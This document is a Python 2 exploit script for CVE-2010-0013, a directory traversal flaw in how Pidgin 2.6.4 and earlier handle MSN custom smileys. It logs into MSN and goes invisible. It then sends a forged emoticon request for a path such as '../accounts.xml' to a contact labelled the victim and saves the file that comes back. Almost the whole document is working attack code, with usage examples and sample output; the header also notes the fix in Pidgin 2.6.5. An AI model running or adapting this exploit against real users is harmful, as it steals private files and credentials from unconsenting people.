#!/usr/bin/env python """ Pidgin MSN <= 2.6.4 file download vulnerability 19 January 2010 Mathieu GASPARD (gaspmat@gmail.com) Description: Pidgin is a multi-protocol Instant Messenger. This is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi. The issue is caused by an error in the MSN custom smiley feature when processing emoticon requests, which could allow attackers to disclose the contents of arbitrary files via directory traversal attacks. Affected versions : Pidgin <= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library. Plugin msn-pecan 0.1.0-rc2 (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date Plateforms : Windows, Linux, Mac Fix : Fixed in Pidgin 2.6.5 Update to the latest version : http://www.pidgin.im/download/ References : [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013 [2] http://www.pidgin.im/news/security/?id=42 Usage : You need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn python pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l] Example : # python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml] *********************************************************** Pidgin MSN file download vulnerability (CVE-2010-0013) Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] *********************************************************** Please enter the password for the account "foo@hotmail.com" Password: [+] Connecting to server [+] Authentication in progress [+] Synchronisation in progress [+] OK, all done, ready to proceed [+] Sending request for file "../accounts.xml" to "victim@hotmail.com" [+] Using session_id 974948028 Current : 3606, total: 3881 (92%) [+] Got an answer from the contact ---------------- ........ """ import warnings warnings.simplefilter("ignore",DeprecationWarning) import os import sys try: import pymsn except ImportError: print "Pymsn couldn't be loaded" print "On debian-like systems, the package is python-msn" sys.exit(-1) import gobject import logging import getpass import hashlib from optparse import OptionParser import signal import time SERVER_ADDRESS = 'messenger.hotmail.com' SERVER_PORT = 1863 FD_OUT = sys.stdout MAINLOOP = None # seconds after which, if we didn't get an answer, we quit TIMEOUT = 5 global_client = None def quit(): MAINLOOP.quit() sys.exit(0) def check_if_succeeds(): # if False, we didn't get a chunk so we won't get any file, so we quit if global_client.GOT_CONTROL_BLOB == False: print "[+] Didn't get an answer from the client after %d seconds, it's likely not vulnerable or the file requested doesn't exist/is not accessible"%TIMEOUT print "[+] Exiting" global_client.quit() # called when we get the result data, after our request def handle_answer(object, client): print "\n[+] Got an answer from the contact" d = object._data data = d.read() length = len(data) FD_OUT.write(data) # if we wrote output to stdout, don't close it if FD_OUT != sys.stdout: FD_OUT.close() print "[+] Wrote %d bytes to file"%length client.end = time.time() duration = client.end - client.begin print "[+] Download lasted %d seconds at %d bytes/s "%(duration,(length/duration)) client.quit() def my_on_chunk_recv(transport, chunk): global_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk) session_id = chunk.header.session_id blob_id = chunk.header.blob_id if session_id == global_client.session_id: # first blob is control, we "squeeze" it and keep only the second one if global_client.GOT_CONTROL_BLOB == False: #print "Got Control blob in our connection (session_id : %d, blob_id: %d)"%(session_id, blob_id) global_client.GOT_CONTROL_BLOB = True else: # if connections is complete, session_id is removed from data_blobs so we have to check before accessing it if global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id): current_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id] print "Current : %d, total: %d (%d%%)\r"%(current_blob.current_size, current_blob.total_size, ((current_blob.current_size*100)/current_blob.total_size)), sys.stdout.flush() def error_handler(self, error_type, error): # __on_user_invitation_failed, probably because contact is offline/invisible if error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \ error == pymsn.event.ContactInviteError.NOT_AVAILABLE: print "[*] ERROR, contact didn't accept our invite, probably because it is disconnected/invisible" quit() # __on_message_undelivered, probably because contact is offline/invisible if error_type == pymsn.event.ConversationErrorType.MESSAGE and \ error == pymsn.event.MessageError.DELIVERY_FAILED: print "[*] ERROR, couldn't send message, probably because contact is disconnected/invisible" quit() print "[*] Unhandled error, error_type : %d , error : %d"%(error_type, error) quit() class MyClient(pymsn.Client): def __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection): # callback to quit self.quit = quit # victim from whom we request the file self.victim = victim # just list contacts for this account self.list_only = list_only # file we request self.filename = filename # to calculate download duration and speed self.begin = 0 self.end = 0 # session_id of the connection to retrieve the file self.session_id = 0 # have we already seen the "control blob" for this connection self.GOT_CONTROL_BLOB = False pymsn.Client.__init__(self, server) # REALLY REALLY HACKISH # if contact is disconnected/invisible, a "NotImplementedError" exception is raised # and it can't be caught AFAIK so it needs to be redefined here # handler_class should be SwitchboardClient for handler_class, extra_args in self._switchboard_manager._handlers_class: handler_class._on_error = error_handler class MyMSNObjectStore(pymsn.p2p.MSNObjectStore): def __compute_data_hash(self, data): digest = hashlib.sha1() data.seek(0, 0) read_data = data.read(1024) while len(read_data) > 0: digest.update(read_data) read_data = data.read(1024) data.seek(0, 0) return digest.digest() # need to compute the SHA hash (SHAd in MSNObject) otherelse the function in MSNObjectStore complains because # the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here) def _outgoing_session_transfer_completed(self, session, data): handle_id, callback, errback, msn_object = self._outgoing_sessions[session] msn_object._data_sha = self.__compute_data_hash(data) super(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data) class ClientEventHandler(pymsn.event.ClientEventInterface): def on_client_error(self, error_type, error): if error_type == pymsn.event.ClientErrorType.AUTHENTICATION: print "[+] Authentication failed, bad login/password" self._client.quit() else: print "[*] ERROR :", error_type, " ->", error def on_client_state_changed(self, state): #print "State changed to %s" % state if state == pymsn.client.ClientState.CLOSED: print "[+] Connection to server closed" self._client.quit() if state == pymsn.client.ClientState.CONNECTING: if self.current_state != state: print "[+] Connecting to server" self.current_state = state if state == pymsn.client.ClientState.AUTHENTICATING: if self.current_state != state: print "[+] Authentication in progress" self.current_state = state if state == pymsn.client.ClientState.SYNCHRONIZING: if self.current_state != state: print "[+] Synchronisation in progress" self.current_state = state if state == pymsn.client.ClientState.OPEN: print "[+] OK, all done, ready to proceed" self._client.profile.presence = pymsn.Presence.INVISIBLE contact_dict = {} for i in self._client.address_book.contacts: contact_dict[i.account] = i if self._client.list_only: for (k,v) in contact_dict.items(): print k+" ("+v.display_name+")" self._client.quit() else: if self._client.victim not in contact_dict.keys(): print "[*] Error, contact %s not in your contact list"%self._client.victim self._client.quit() else: contact = contact_dict[self._client.victim] store = MyMSNObjectStore(self._client) object = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, 'AAA=','2jmj7l5rSw0yVb/vlWAYkK/YBwk=') print "[+] Sending request for file \"%s\" to \"%s\""%(self._client.filename, self._client.victim) self._client.begin = time.time() store.request(object, [handle_answer, self._client]) # at this moment, we got only one session_id, the one we will use to request the file for k in store._outgoing_sessions.keys(): print "[+] Using session_id %d"%k._id self._client.session_id = k._id # hack to set up my own callback each time we receive a chunk, used to print the percentage of the download self._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received self._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv # if no file transfer received from the victim after TIMEOUT seconds, quit gobject.timeout_add(TIMEOUT*1000, check_if_succeeds) def __init__(self, client): self.current_state = None pymsn.event.ClientEventInterface.__init__(self, client) if __name__ == '__main__': print "***********************************************************\n" print "Pidgin MSN file download vulnerability (CVE-2010-0013)\n" print "Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\n" print "***********************************************************\n" usage = "Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] " parser = OptionParser(usage=usage) parser.add_option("-f", "--file", dest="filename", default=None, help="File requested to remote contact") parser.add_option("-o", "--output", dest="output_file", default=None, help="Where to write received file, STDOUT otherelse") parser.add_option("-a", "--account", dest="account", default=None, help="MSN account to use") parser.add_option("-c", "--contact", dest="contact", default=None, help="Contact to request file from") parser.add_option("-l", "--list", dest="list_only", action="store_true", default=False, help="Just print contact list for your account and exit") (options, args) = parser.parse_args() if not options.filename or not options.account or not options.contact: if not (options.account and options.list_only): print "Error, parameter missing" parser.print_help() sys.exit(-1) if options.output_file != None: try: FD_OUT = open(options.output_file,"wb") except Exception,e: print "Cannot open file %s (%s)"%(options.output_file, e) sys.exit(-1) MAINLOOP = gobject.MainLoop() def sigterm_cb(): gobject.idle_add(quit) signal.signal(signal.SIGTERM, sigterm_cb) logging.basicConfig(level=logging.CRITICAL) # allows us to see the protocol debug server = (SERVER_ADDRESS, SERVER_PORT) client = MyClient(server, quit, options.contact, options.filename, options.list_only) global_client = client client_events_handler = ClientEventHandler(client) print "Please enter the password for the account \"%s\""%options.account try: passwd = getpass.getpass() except KeyboardInterrupt: quit() login_info = (options.account, passwd) client.login(*login_info) try: MAINLOOP.run() except KeyboardInterrupt: quit()